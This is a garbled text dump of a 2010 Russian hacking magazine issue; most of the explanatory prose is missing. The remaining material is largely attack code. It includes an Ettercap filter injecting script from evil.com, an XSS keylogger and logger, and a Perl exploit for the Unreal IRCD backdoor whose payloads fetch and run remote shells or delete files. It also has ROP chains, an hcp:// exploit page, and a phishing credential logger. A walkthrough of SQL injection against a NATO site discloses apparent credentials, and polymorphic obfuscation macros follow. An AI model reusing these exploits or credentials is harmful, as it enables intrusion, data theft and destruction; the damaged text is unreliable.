GreenDog agrrrdog@gmail.com
Easy Hack
HTTP.
, etag,
.
httprint.
: HTTP
:
][ , / , FTP-
HTTP-. , ,
. HTTP-.
, Server .
. ? . ,
- - .
, -
. RFC /
.
(fingerprint) HTTP-, .
, . ,
() , .
:
HTTP-;
:

-
;

;
.
, , .
,
-.
, , . .
, httprint win/nix BT 4 (net-square.com/
httprint/), httprecon win (computec.ch/projekte/
httprecon/. , :).
.
, , , - - . ,

, .
, - , . , net-square.com/
httprint/httprint_paper.html ServerMask IIS.
- - ( )
www.netcraft.com.
DELETE / HTTP/1.0 ;
GET / HTTP/3.0 ;
GET / LALA/1.0 ;
HEAD / ;
.
( , 100
:)) . shodanhq.com.
ujeni.murkyroc.com/
hmap/. computec.ch/projekte/
httprecon/?s=database.
,
-;
(404, ) ;
038
, HTTP-
HTTP-, .
X 08 /139/ 10
: PHP
.
:
, .
, mod_rewrite (
_).
? , PHP ,
. ,
exploit-db.com. -,
PHP.
:
,
ETTERCAP.
:
.
,
. ,
, .
Ettercap NG.
GUI , .
0.7.3. ettercap.sourceforge.net
nix, . , ,
. :
.
PHP. PHP-,
Fatal Error. :
.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
.php?=SUHO8567F54-D428-14d2-A769-00DA302A5F18
, PHP, ZEND,
, Suhosin ( PHP). PHP.
www.0php.
com/php_easter_egg.php.
, ,
PHP, expose_php=off
php.ini.
PHP
Ettercap, BackTrack 4.
. http_filter.txt
HTTP-.
// TCP, 80
if (ip.proto == TCP && tcp.dst == 80) {
Ettercap NG. .
, , ;
;
Man in the Middle (MitM);
,
.
, Ettercap
.

TCP/IP- .
: -, ; -,
Ettercap HTTP-
, .
, .
X 08 /139/ 10
039
//
if (search(DATA.data, "Accept-Encoding")) {
//
replace("Accept-Encoding", "Blabla-Blahblah");
//
msg("Accept-Encoding field has been changed\n");
}
}
// TCP, 80
if (ip.proto == TCP && tcp.src == 80) {
replace("</body>", " <script type=\"text/javascript\"
src=\"http://evil.com/sploit.js\"></script> \" ");
// HTML-,
-
replace("</html >",
" <img src=\"http://evil.com/evil.gif\"></img>");
msg("Success!\n"); //
}
Ettercap ,
. .
, 80
TCP.
-. Accept-Encoding ( HTTP-, )
( ). ,
Accept-Encoding , -
. HTML-.
- .
.
. .
- ( TCP, 80).
</body>, </html > , -,
. ?
:
.
:

.
- - ( :)).
,
. .
/
( ). , , , ... ,
http://yehg.net/q. ,
( ) .
- ,
. ,
. -, yehg ,
, .
, , whois , / .. ,
. , ,
. - , .
, - (gosu.pl/wsa/). , JavaScript .
.
040
HTML-
,
. , .. : replace
,
, msg ,
, .
Ettercapa . :
etterfilter http_filter.txt -o http_filter.ef
http_filter.txt , -o http_filter.ef ttercap- ( ).

Ettercap.
ettercap -T -F http_filter.ef -M ARP /192.168.0.1/
-T ,
Ettercap; -F http_filter.ef Etterfilter
; -M ARP /192.168.0.1/ Ettercap,
MitM , arp- ( Ettercap
). 192.168.0.1 IP . , arp-
, ARP ,
,
. Ettercap
, HTML . , Ettercap . ,
. , , , ...
man Ettercap . ,
, , ,
, .
.
, - ,
HTML . ,
. :
CATS["General"] = {
xakep.ru
X 08 /139/ 10
"xakep": "http://www.xakep.ru/local/search/search.
asp?text=%s",
};
%s , , .
General xakep.
.
. , , ,
: ,
XSS .
:
XSS : , . , , , , - .
XSS- . ,
, . XSS ! .
XSS?
: JavaScript,
, , . ( )
, , PHP. JavaScript ( insanesecurity.info):
var keys=''; //
document.onkeypress = function(e) {
//
get = window.event?event:e; //
key = get.keyCode?get.keyCode:get.charCode;
//
key = String.fromCharCode(key); //
keys+=key; //
}
window.setInterval(function(){
//
new Image().src = 'http://_:80/keylogger.
php?keys='+keys; //
keys = ''; //
}, 1000);
(vulnerability or vulnerabilities)
OR (exploits or security holes),
.
, YEHG, ,
. ,
.
.
( ), . ,
.
:
,
PHP-, .
PHP-:
<?php
$log= $_SERVER["QUERY_STRING"]."\r\n";
// js
$fp=fopen("log.txt", "a"); //
fputs($fp, $log); //
fclose($fp);
?>
, ,
XSS .

.
.
- sourceforge.
net/projects/jskeylogger/ ( ). 1.4.
. :
, ID
, .
, exe .
PHP, , .
, . . ,
, .
.
, , , , , .
.z
jskeylogger v1.4 : IP, ID,
X 08 /139/ 10
041

, Digital Security a.sintsov@dsec.ru

,
, .
. ,
, ,
. .
state-of-art, , .
,
, .
01

UNREAL IRCD
CVE
CVE-2010-2075
TARGETS
Unreal IRCD v. 3.2.8.1
BRIEF
IRC-
Unreal IRCD. , IRC
. Facebook,
Twitter, .
, IRC - .
/ ( ), ,
, WEB 2.0, ,
(BackDoor ) Unreal IRCD.
IRC-
2009 . ,

. ,
.
EXPLOIT
,
Unreal IRCD, .
Metasploit .
, . ,
,
s_bsc.c, read_
packet(). .
readbuf.
, , ,
, , :
#ifdef DEBUGMODE3
if (!memcmp(readbuf, DEBUGMODE3_INFO, 2))
042
DEBUG3_LOG(readbuf);
#endif

, DEBUGMODE3_INFO (
DEBUGMODE3). ,
DEBUG3_LOG(). ?
, struct.h.
#define DEBUGMODE3 ((x)->flags & FLAGS_NOFAKELAG)
. . .
#ifdef DEBUGMODE3
#define DEBUGMODE3_INFO "AB"
#define DEBUG3_LOG(x) DEBUG3_DOLOG_SYSTEM (x)
. . .
#define DEBUG3_DOLOG_SYSTEM(x) system(x)
:

AB. , system(), .
:
#!/usr/bin/perl
# Unreal3.2.8.1 Remote Downloader/Execute Trojan
# DO NOT DISTRIBUTE -PRIVATE# -iHaq (2l8)
use Socket;
use IO::Socket;
## Payload options
# .
# unix/linux,
AB;.
# ,
# system(); -
# .
my $payload1 = 'AB; cd /tmp; wget http://
X 08 /139/ 10
BlazeDVD. ROP
packetstormsecurity.org/groups/synnergy/bindshellunix -O bindshell; chmod +x bindshell; ./bindshell &';
my $payload2 = 'AB; cd /tmp; wget http://efnetbs.webs.
com/bot.txt -O bot; chmod +x bot; ./bot &';
my $payload3 = 'AB; cd /tmp; wget http://efnetbs.webs.
com/r.txt -O rshell; chmod +x rshell; ./rshell &';
my $payload4 = 'AB; killall ircd';
my $payload5 = 'AB; cd ~; /bin/rm -fr ~/*;/bin/rm -fr
*';
$host
$port
$type
$host
$port
$type
=
=
=
=
=
=
"";
"";
"";
@ARGV[0];
@ARGV[1];
@ARGV[2];
if ($host eq "") { usage(); }

if ($port eq "") { usage(); }
if ($type eq "") { usage(); }
sub usage {
printf "\nUsage :\n";
printf "perl unrealpwn.pl <host> <port> <type>\n\n";
printf "Command list :\n";
printf "[1] - Perl Bindshell\n";
printf "[2] - Perl Reverse Shell\n";
printf "[3] - Perl Bot\n";
printf "-----------------------------\n";
printf "[4] - shutdown ircserver\n";
printf "[5] - delete ircserver\n";
exit(1);
}
sub unreal_trojan {
my $ircserv = $host;
my $ircport = $port;
#
my $sockd = IO::Socket::INET->new (PeerAddr =>
$ircserv, PeerPort => $ircport, Proto => "tcp") || die
"Failed to connect to $ircserv on $ircport ...\n\n";
print "[+] Payload sent ...\n";
#
if ($type eq "1") {
print $sockd "$payload1";
X 08 /139/ 10
} elsif ($type eq "2") {

} else {
printf "\nInvalid Option ...\n\n";
usage();
}
close($sockd);
exit(1);
}
unreal_trojan();
# EOF
SOLUTION
, ,
, , MD5-
. 752e46f2d873c1679fa9
9de3f52a274d, 7b741e94e867c0a7370553fd015
06c66. IRC-
( - ,
).
02

BLAZEDVD PLAYER
CVE
N/A
TARGETS
BlazeDVD Player 5.1
BRIEF
,

. , Windows 7,
, DEP ASLR. -,
mr_me, (Steven Seeley). ,
, ,
( https://net-ninja.net). ,
Corelan Security Team, ,
043
Acrobat Reader. . SWF- PDF
corelanc0d3r, 10- ,
, - . ,
.
BlazeDVD.
EXPLOIT
cst-blazedvd.plf, BlazeDVD Player
MessageBoxA ,
:). Windows 7 . -, ,
( ) ,
.
MessageBox ,
Windows 7
. ,
( SEH ),
- , ,
VirtualProtect, -
(VirtualProtect/MessageBox).
, , ROP, .
,
.
,
- .
RETN,
, .
, . mr_me
, , ASLR
. ,
ASLR,
( ROP, Forb
( . .)). ROP . :
SEH
. ROP .
mr_me
. (,
) :
0x616074AE : ADD ESP, 408
0x616074B4 : RETN 4
; ,
, ROP- , RETN
4 , mr_me.
ROP ,
044
( ... , , ...)
- . . ROP
. , , .
SOLUTION
, .
. ,
, /dinamicbase /
GS- . SehOP
,
.
03

FLASH PLAYER
CVE
CVE-2010-1297
TARGETS
Adobe Acrobat Reader < 9.4
Adobe Flash Player < 10.1
BRIEF
0day-
Adobe. ?
SWF Flash. , , , Acrobat Reader. ,
-,
. Metasploit. ...
EXPLOIT
, ,
, SWF-,
, AES-PHP.swf, . , ,
- 0x66 (GetProperty)
X 08 /139/ 10
<---- 0x0C0C0C0C+0x8 = EAX+8 (1)

0x700156f,
# mov eax,[ecx+0x34] / push [ecx+0x24] /
call [eax+8] ;( 1)
0xcccccccc,
0x7009084,
# ret ( 4)
0x7009084,
# ret ( 5)
0x7009084,
# ret ( 6)
0x7009084,
# ret ( 7)
0x7009084,
# ret ( 8)
0x7009084,
# ret ( 9)
0x7009033,
# ret 0x18 ( 10)
0x7009084,
# ret
0xc0c0c0c,
# <---- 0x0C0C0C0C+0x34, ESP (2)
0x7009084,
# ret
0x7009084,
# ret
0x7009084,
# ret
0x7009084,
# ret
0x7009084,
# ret ( 11)
0x7009084,
# ret ( ROP)
....
Acrobat Reader. heap-spray
- 0x40 (newfunction). ,
.
, SWF-, PDF heap-spray
JavaScript. , . , DEP,
ROP-,
.
ROP-
. ( - newfunction)
ECX 0x0C0C0C0C, call [ecx+0c]. ,
heap-spray.
, 0x0C0C0C0C
+ 0xC : 0x700156f.
call 0x700156f. BIB.dll
:
mov eax,[ecx+0x34]
; ECX heap-spray (0x0C0C0C0C)
; 0x0C0C0C0C+0x34
0x0C0C0C0C
; EAX
push [ecx+0x24]
call [eax+8]
; 0x0C0C0C0C+0x8 0x70048ef
0x70048ef , :
xchg eax,esp
ret
; EAX=0x0C0C0C0C, ESP
;
heapspray.
( 4 ,
0x0C0C0C0C).
0x7004919,
# pop ecx / pop ecx / mov [eax+0xc0],1 /
pop esi / pop ebx / ret ;( 3)
0xcccccccc,
0x70048ef,
# xchg eax,esp / ret ;( 2)
X 08 /139/ 10
, - RETN.
CALL JMP,
-.
SOLUTION
Flash 10.1 , -
. , BIB.dll,
, , ASLR,
Windows 7
.
04

WINDOWS HELP CENTRE
CVE
CVE-2010-1885
TARGETS
Windows XP
BRIEF
, . (Tavis
Ormandy), , , ,
.
0day JAVA Deployment Tool Kit, Windows XP, , .
,
, . Microsoft' ,
, , .
,
.
.
Microsoft - ,
Google . , ? .
, ,
security-research. Google
045
,
. REF , ,
PARAM name="HTMLView"
starthelp.html:
Windows Help Center. .
; , , .
. Immunity
, , , , ,
.
, ...
, . ,
. .
NO MORE FREE BUGS. ,

, .
...
EXPLOIT
(helpctr.exe), , URL ,
hcp://.
, . , , , .
, XSS .
hcp://system/sysinfo/sysinfomain.htm?svr=<h1>test</
h1>
,
: : <script
defer>eval(unescape
('Run("calc.exe")'))</script>. - IE8
.
Windows Media Player... , ... ,
, ,
ActiveX. URL,
, ASX-, ,
, , , :
<ASX VERSION="3.0">
<PARAM name="HTMLView"
value="http://ZLOI-URL/starthelp.html"/>
<ENTRY>
<REF href="http://ZLOI-URL/bug-vs-feature.jpg"/>
</ENTRY>
</ASX>
046
46
<iframe src="hcp://services/search?query=anything&
topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%
A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%
%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%
%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%
A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.
htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%
28%27Run%2528%2522calc.exe%2522%2529%27%29%29%3C/
script%3E">

, . ,
hex' unescape-, .
, IE7 -
... . Media Player'
- , :
<html><head><title>Testing HCP</title></head>
<body><h1>OK</h1>
<script>
// HCP:// Vulnerability, Tavis Ormandy, June 2010.
var asx = "http://ZLOI-URL/simple.asx"; //
// IE, asx.
if (window.navigator.appName
== "Microsoft Internet Explorer") {
// Internet Explorer
var o = document.createElement("OBJECT");
o.setAttribute("classid",
"clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6");
o.openPlayer(asx); //!
// IE, asx ,
// ,
// ...
} else {
// Mozilla, Chrome, Etc.
var o = document.createElement("IFRAME");
o.setAttribute("src", asx);
document.body.appendChild(o); //!
}
</script>
</body></html>
, , ZLOI-URL.
SOLUTION
hcp ( HKCR\HCP\shell\open)
.
http://lock.cmpxchg8b.com/
b10a58b75029f79b5f93f4add3ddf992/hcphotfix.zip.
helpctr.exe, .
Microsoft. z
X 08 /139/ 10

. ,
, , - 5
, WiFi-
( ). , ,
, ,
. , , ,
, ,
. ,
. , ,
-.
:
, ( , ). ,
, .
- ,
WiFi-, , , .
, . -,
: , !, X 08 /139/ 10
.. ..
, .
, , (
. .) -
-
.
, , ,
. ,
, ( 10
) .
? , ,
(
!).
047
, ,

ARP- IP

DVD
dvd

,

(MACChange,
Small HTTP Server,
WireShark
, Ufasoft
Sniffer, InterCepter),
PHP-,
WARNING
warning

!
,

048
- ,
.
,
( ).
:).
( ,
, ..).
... !
, , WireShark
.
SSL- ...
, :
WEP/WPA-,
.
(
SMS- ), ,
, , .
, SSL-

, XOR
( Ufasoft Sniffer
InterCepter) ,
( ... :).
( ,
IP- , ).
, , , (
!) - (
:). IP MAC-,
( ARP-),
.
,
, .
,
:).
, MACChange ( , ) .
IP.
. , ,
DHCP-, Static-. ,
,
. , !
, ?..
, , .
, ? MitM-, .
.
: -,
.
, DIR-300 DHCP-.
SSID
.
-
Small HTTP Server.
.
, ,
.
WEB- DNS-, - -
HTML-, .
PHP-, txt-.
<?php
$filename = 'S:\home\localhost\www\info.txt';
$a = $_GET['login'];
$b = $_GET['password'];
$somecontent = " -- - \n".$a." -- - \n".$b." -- \n";
//

if (is_writable($filename))
if (!$handle = fopen($filename, 'r+'))
{
echo " ($filename)";
exit;
}
if (!fwrite($handle, $somecontent))
{
X 08 /139/ 10
MACChange. -

echo " ($filename)";

exit;
}
else{echo " ";}
echo " ($somecontent) ($filename)";
fclose($handle);
}
else {
echo " $filename ";
}
?>
, !
MITM
:
.

SSID, .
, .
,
.
. , , .

PHP- .
(, , :) . .).
,
: ,
, ,
, .
. ! , ,
: -
.
SSL- .
? , ( ).
.

, .
,
,
(, , ).
:
, ,
(
VPN-),
. z
txt-
X 08 /139/ 10
049

ANTI-NATO natobreak@yahoo.com
, , ,
-.
. ,
, .
. ,
. , , , .
,
, , ( ).
, .
, SQL-,
XSS, LFI/RFI ,
.
,
.
, , ,
, -
. ,
( Acunetix, nikto, w3af sqlmap)

050
-. , ,

,
, .
, , , ,
?
, .
, , , -
, -
, .
( ) ,
, .
, ,
- .
X 08 /139/ 10
,

, Research & Technology Organisation (RTO),
.

. - , , , , .
, ?
-
. -,
- ,
. , ,
, ,
- RTO.NATO.INT. ,
,
, ,
.
,
.
, robots.txt:
User-agent: *
Disallow: /images/
Disallow: /img/
Disallow: /homepix/
Disallow: /rndimg/
Disallow: /Include/
Disallow: /hpix/
Disallow: /Mailer/
Disallow: /InfoPack/
Disallow: /aspx/
Disallow: /bin/
Disallow: /cgi-bin/
Disallow: /ContactUs.aspx
Disallow: /Copyright.htm
Disallow: /css/
Disallow: /Detail.asp
Disallow: /enrolments/
Disallow: /FAQ.htm
Disallow: /foad.htm
Disallow: /fr/
Disallow: /help.htm
Disallow: /pfp.ppt
...
Disallow: /Prog/
Disallow: /Reports.asp
Disallow: /SendAbstractDetails.aspx
Disallow: /tor.asp
X 08 /139/ 10
Disallow: /Taxo/
Disallow: /Variables.asp
Disallow: /variables.asp
Disallow: /voc.htm
Disallow: /vpn.html
Disallow: /Webmail.asp
Disallow: /yourws.asp
Sitemap: http://www.rto.nato.int/sitemap.xml
2010 , RTO
, (pfp.ppt).
nikto ,
-? ,
nikto , :
- Nikto v2.03/2.04
----------------------------------------------------+ Target IP:
62.23.200.67
+ Target Hostname:
www.rto.nato.int
+ Target Port:
80
+ Start Time:
2010-05-08 14:00:15
----------------------------------------------------+ Server: RTA Web Server
- /robots.txt - contains 47 'disallow' entries which
should be manually viewed. (GET)
- Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD
+ OSVDB-877: HTTP method ('Allow' Header): 'TRACE'
is typically only used for debugging and should be
disabled. This message does not mean it is vulnerable
to XST.
- Public HTTP Methods: OPTIONS, TRACE, GET, HEAD,
POST
+ OSVDB-877: HTTP method ('Public' Header): 'TRACE'
is typically only used for debugging and should be
disabled. This message does not mean it is vulnerable
to XST.
+ OSVDB-0: ETag header found on server, fields:
0x7036cddda14ca1:18b2
+ OSVDB-3092: GET /sitemap.xml : This gives a nice
listing of the site content.
+ 3577 items checked: 49 item(s) reported on remote
host
+ End Time:
2010-05-08 14:49:54 (2979 seconds)
----------------------------------------------------+ 1 host(s) tested
Test Options: -Cgidirs all -vhost www.rto.nato.int
-host www.rto.nato.int www.rto.nato.int
-----------------------------------------------------
051
, , Windows , LFI
- ( ,
, nikto :)),
. , , webmail.
a sp ,
Detail.asp -.
disallow
robots.txt, webscarab.
,
sqlmap' w3af'. ,
, , topics. ,
:
http://www.rto.nato.int/Main.asp?topic=Main.asp
, .ASP, (, Main.asp

1990- .
,
( ,
, ,
, ).
, .
,

. ,
, . ,

.
,
.
052
- BASE64

topic, - ,
Main.asp ,
pfp.ppt,
.
... . , , :
http://www.rto.nato.int/Main.asp?topic=../../../../..
/../../../../../../etc/passwd
ORACLE , ORACLE
, -, - Oracle,
SQL- XSS.
Oracle -
( ),
SQL-. , - X 08 /139/ 10
(
). SQL-
, -,
.
. ,
+or+chr(77)=chr(77). chr() ,
.
RTO. , ,
:
:
http://www.rto.nato.int/Detail.asp?ID=1+or+chr(77)=chr(77)
Oracle:
http://www.rto.nato.int/Detail.asp?ID=1+or+1=(SELECT+1+FROM+DUAL)
, ,
(backend) Oracle, MySQL SQLite (,
SQL-
). , Oracle
. !
.
, ,
. ,
,
Perl.
,
,
:
) :
http://www.rto.nato.int/Detail.
asp?ID=-1+OR+(select+length(table_
name)+from+user_tables+where+'%
X 08 /139/ 10
%'+AND+rownum=1)=% , %
) (
):
http://www.rto.nato.int/Detail.asp?ID=1+OR+(select+substr(column_name,%
%,1)+from+all_tab_columns+where+table_
name='.% %.'+AND+'%
%'+AND+rownum=1)=chr(% %)
,
, rownum
SQL- Oracle,
.
:). , ,
( )
Oracle. ,
,
PASSWORD. c
.
, :).

:
RTO_MEMBERS.MEMBER_PASSWORD
RTO_PANEL.PANEL_PASSWORD
USER_DB_LINKS.PASSWORD
CONTACTLOGIN.CLO_PASSWORD
APPLICATIONLOGIN.PASSWORD
CONTACT.CLO_PASSWORD
, , ,
.
USERNAME: RTAMASTER
PASSWORD: droopy
DB_LINK: TEST.RTA.INT
USERNAME: WISE
053
Main.asp
PASSWORD: BUGSBUNNY
DB_LINK: WISE_LINK
,
. , ,
.

:
DB Scanning table rto_panel
..........[DBG: FOUND NUMBER 29.]
DB NUMBER OF ROWS FOUND: 29
Getting row 1
DB getting panel_webname
.......[DBG: FOUND NUMBER 1.]
.........[DBG: FOUND SYMBOL ' ' - 32]
DB
DB getting panel_password
........[DBG: FOUND SYMBOL '' - 245]
........[DBG: FOUND SYMBOL '' - 191]
. . .
.........[DBG: FOUND SYMBOL '$' - 36]
.........[DBG: FOUND SYMBOL '' - 168]
DB )z54<!*t$
DB 245|191|201|41|122|24|60|198|33|196|42|192|116|164
|36|168|
DB getting panel_number
.........[DBG: FOUND SYMBOL 'R' - 82]
. . .
........[DBG: FOUND SYMBOL 'A' - 65]
DB RTA-CSA
DB getting panel_alias
. . .
054
........[DBG: FOUND SYMBOL 'A' - 65]

DB RTA-CSA
"panel_webname"
"panel_password", MD5 .
. , , .
- , RTO.
"SINGLE SIGN-ON",

:
Please authenticate to access website protected areas
and the RTO collaborative environment. Use your RTO
collaborative environment credentials or the RTO
generic credentials to log on.
, , ,
/.
, ( ) . ,
,
RTO.NATO.INT.
,
, ?
. ,

JavaScript-. ,
, HTML md5.js, MD5
RSA Data Security (, ,
). X 08 /139/ 10
pw2md5(in_pw, out_md5),
:
<form action="checkident.asp" method="post"
name="frmlogon" onSubmit="return sendData();">
. . .
. . .
function sendData()
{
var FORM = document.frmlogon;
pw2md5(FORM.MemberMatkhau,FORM.MemberMatkhau);
return true;
}
pw2md5().
, MD5 , 16- BASE64-
.
md5.js:
/*
* A JavaScript implementation of the RSA Data
Security, Inc. MD5 Message
* Digest Algorithm, as defined in RFC 1321.
* Version 2.1 Copyright (C) Paul Johnston 1999 2002.
* Other contributors: Greg Holt, Andrew Kepert,
Ydnar, Lostinet
* Distributed under the BSD License
* See http://pajhome.org.uk/crypt/md5 for more info.
*/
. . .
. . .
/*
* Util method added by minhnn
*/
function pw2md5(password, md5password) {
md5password.value = b64_md5(password.value) + "==";
// password.value = "";
}
,
MD5!
! - BASE64,
MD5 .
motobit.com, :
USERNAME: IST
PASSWORD: AD2F38AEE7B3162D832624DA76983CD2
BASE64: rS84ruezFi2DJiTadpg80g==
X 08 /139/ 10
- Mozilla Firefox TamperData, POST-

MD5 , . , TamperData... , ,
... , , ,
!. , !
, !
, , SQL
, . Oracle
, SQLite MySQL (
, Oracle , iDefense Labs, ,
).
, XDB.
XDB_PITRIG_PKG.PITRIG_DROPMETADATA, .
10g , Oracle
. ,
, :
declare
a varchar2(32767);
b varchar2(32767);
begin
a:='XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
b:='YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY';
a:=a||a; a:=a||a; a:=a||a; a:=a||a; a:=a||a;
a:=a||a;
b:=b||b; b:=b||b; b:=b||b; b:=b||b; b:=b||b;
b:=b||b;
XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA(a, b);
end;
,
,
.

, , . ,

, , , .
. , ,
(
), .
, -
:). , -,

. ? z
055

HellMilitia and my Death icq 884888, http://snipper.ru
, , ,
: ( ), ( ),
(
), ( , ), ( , patch'), .
, , ,
; ...
, !
0XBA11EE PRNG

. ,
ANSI C, .
rndseed = 100500
,
,
,
.

, .

-
FASM,
?
,

.

, ,

.
.
, , timestamp, UNIX-.
: randseed = %t. , ,
0 - 0xDEAD, :
randomize
random_number = rndnum mod 0xDEAD - 1
0XBADC0DE
,
int. int 0xCD
, . :
randomize
int_val = rndnum mod 0xFF
macro randomize {
randseed = randseed * 1103515245 + 12345
randseed = (randseed / 65536) mod 0x100000000
db 0xCD
db num
rndnum = randseed and 0xFFFFFFFF

}
, , , ,
056
. 4 gen_int
, , : rept 7 { gen_int }.
:
X 08 /139/ 10
macro freereg {
RREG = NOREG
while (RREG = RESP) | (RREG = REBP) | (RREG = -1)
| (RREG = USEDREG1) | (RREG = USEDREG2)
randomize
RREG = rndnum mod 8
end while
}
cd78
cda6
cdb4
cd36
cdec
cd6a
cd68
|
|
|
|
|
|
|
int
int
int
int
int
int
int
0x78
0xa6
0xb4
0x36
0xec
0x6a
0x68
rept fasm' . -,
, .
lea;
. , :
REAX
RECX
REDX
REBX
RESP
REBP
RESI
REDI
=
=
=
=
=
=
=
=
0
1
2
3
4
5
6
7
;
;
;
;
;
;
;
;
AL
CL
DL
BL
AH
CH
DH
BH
, .
, :
NOREG
USEDREG1
USEDREG2
RREG
=
=
=
=
-1
NOREG
NOREG
NOREG
,
.
, , . .
macro rndreg {
RREG = NOREG
while (RREG = NOREG) | (RREG = RESP) | (RREG = REBP)
randomize
RREG = rndnum mod 8
end while
}
, Esp Ebp , . , :
X 08 /139/ 10
Esp Ebp , .
, .
( ,
), . lea, , ,
\ . , ?
Entry Point - (Entry Point + ), , ,
0x1000.
. ,
lea , :
macro gen_lea {
freereg
reg = (RREG * 8) + 5
randomize
address = (rndnum mod ((ENTRY_POINT + 0x1000 + 1)
- ENTRY_POINT)) + ENTRY_POINT
db 0x8D
db reg
dd address
}
ENTRY_POINT :
entry start
...
start:
ENTRY_POINT = $
, : ENTRY_POINT = $$. , :
8d3db10a4000
8d154c044000
8d1d68054000
8d05e7024000
8d15db0e4000
8d15670f4000
|
|
|
|
|
|
lea
lea
lea
lea
lea
lea
edi,
edx,
ebx,
eax,
edx,
edx,
[0x400ab1]
[0x40044c]
[0x400568]
[0x4002e7]
[0x400edb]
[0x400f67]
, , .
,
,
FPU:
macro gen_fpu {
randomize
type = rndnum mod 0x2F
db 0xD8
db 0xC0 + type
}
057
XOR_KEY, , .
randomize
XOR_KEY = rndnum mod 0xFF

d8d1
d8c9
d8d4
d8ed
d8d6
d8c2
|
|
|
|
|
|
fcom st0, st1

fmul st0, st1
fcom st0, st4
fsubr st0, st5
fcom st0, st6
fadd st0, st2
! , gen_trash,
.
, ,
. , / .
, , :
macro gen_trash length {
repeat length
randomize
variant = randseed mod VARIANTS
if variant = 0
gen_lea
else if variant = 1
gen_fpu
end if
end repeat
}
10 :
gen_trash 10. ,
. \: ; ; (
FPU- ,
? lea, ? ).
,
, .
gen_trash. ,
:
gen_trash 15
mov eax, .CodeStart
USEDREG1 = REAX
gen_trash 27
mov ecx, CodeSize
USEDREG2 = RECX
gen_trash 20
.again:
xor byte[eax], XOR_KEY
gen_trash 37
inc eax
gen_trash 10
loop .again
gen_trash 43
058

, ,
. , \
, , , , ,
lea eax,[ ecx*4+100 ]... !.. ,
, .

, .
0XACED1A

. , .
,
gen_trash, . ,
.
macro adbg {
randomize
variant = rndnum mod N
randomize
destination = (rndnum mod ((ENTRY_POINT + 0x1000)
- ENTRY_POINT)) + ENTRY_POINT
if vatiant = 0
invoke IsDebuggerPresent
test eax,eax
jnz $+destination
else if variant = N
.....
}
. .
0XACE API-
, .
Windows API.
, .
API-:
macro gen_trash_api {
randomize
RandomParam1 = rndnum mod 0xFFFFFFFF
randomize
RandomParam2 = rndnum mod 0xFFFFFFFF
randomize
variant = rndnum mod 4
if variant = 0
invoke IsBadReadPtr,RandomParam1,RandomParam2
else if variant = 1
invoke IsBadWritePtr,RandomParam1,RandomParam2
else if variant = 2
invoke IsBadCodePtr,RandomParam1
else if variant = 3
invoke GetLastError
end if
}
, API- Eax, Ecx

X 08 /139/ 10
mov
push arg2
mov arg1,[esp]
add esp,4
else if variant = 2
push arg2
xchg arg1,arg2
pop arg2
else if variant = 3
mov arg1,arg2
end if
else
mov arg1,arg2
end if

Edx. ,
.
gen_trash. ;
, . , .
, :
:
macro GetLastError {
rnd
if variant = 0
mov eax,[fs:18h]
mov eax,[eax+TEB.LastError]
else if variant = 1
invoke GetLastError
end if
}
0XA11A5,
. FASM
, . , , mov
reg32_1, reg32_2. ? ,
( ):
push reg32_2
pop reg32_1
push reg32_2
mov reg32_1,[esp]
add esp,4
push reg32_2
xchg reg32_1,reg32_2
pop reg32_1
, ,

. ,
mov. , ,
:
macro mov arg1,arg2 {
if (arg1 eqtype eax) & (arg2 eqtype eax)
rnd
if variant = 0
push arg2
pop arg1
else if variant = 1
X 08 /139/ 10
mov eax,ecx
mov ecx,ecx
mov edx,esp
:
51
91
59
89e5
53
59
|
|
|
|
|
|
push ecx
xchg ecx, eax
pop ecx
mov ebp, esp
push ebx
pop ecx
, ?
, .
0XAB1E,
.
.
, .
, , . : , ,
,
. ( , ),
:
fproc_1 = 0
fproc_2 = 0
...
entry $
;
...
while (flag_1 = 0) | (flag_2 = 0)
randomize
sequence = rndnum mod 2
if sequence = 0
if flag_1 = 0
proc_1
059

RAZ0R HTTP://RAZ0R.NAME
push destination - value

add [esp],value
jmp [esp]
else if variant = 1
randomize
value = rndnum mod (0xFFFFFFFF - IMAGE_BASE
- 0x1000)
push destination + value
sub [esp],value
jmp [esp]
end if

,
,
}
macro o_label name {
label name
add esp,4
}
:
flag_1 = 1
end if
else if sequence = 1
if flag_2 = 0
proc_2
flag_2 = 1
end if
end if
end while
macro proc_1 {
proc AnyProcedure1
...
ret
endp
}
macro proc_2 {
proc AnyProcedure2
....
ret
endp
}
, ,
, , .
0XDEFACED, :

. , :
push label - value
add [esp],value
jmp [esp]
....
label:
add esp,4;
, , , , . o_jmp olabel:
macro o_jmp destination {
randomize
if variant = 0
randomize
value = rndnum mod IMAGE_BASE
060
68001127b6
812c249b10e7b5
ff2424
31c0
83c404
31c0
|
|
|
|
|
|
push dword 0xb6271100

sub dword [esp], 0xb5e7109b
jmp dword near [esp]
xor eax, eax
add esp, 0x4
xor eax, eax
, , ,
. \ ,
Esp , .
, (
). ,
. :
macro facke_code_ref data_addr,jmp_addr {
xor eax,eax
inc eax
jnz jmp_addr
call data_addr
;trash
}
data_addr .
0XA55 \
FASM,
, load store.
. , xor:
macro xor_data start,length,key {
repeat length
load x from start+%-1
x = x xor key
store x at start+%-1
end repeat
}
, . :
randomize
XOR_KEY = rndnum mod 0xFF
xor_data strings, strings_size, XOR_KEY
strings:
X 08 /139/ 10

radare
any_string db 'Mate.Feed.Kill.Repeat'
strings_size = $ - strings
0XABA51A,
,
, .
int3,
. , crc32 :
CRC32_SUM = 0
macro calc_crc32 start, size {
local b,c
c = 0xffffffff
repeat size
load b byte from start+%-1
c = c xor b
repeat 8
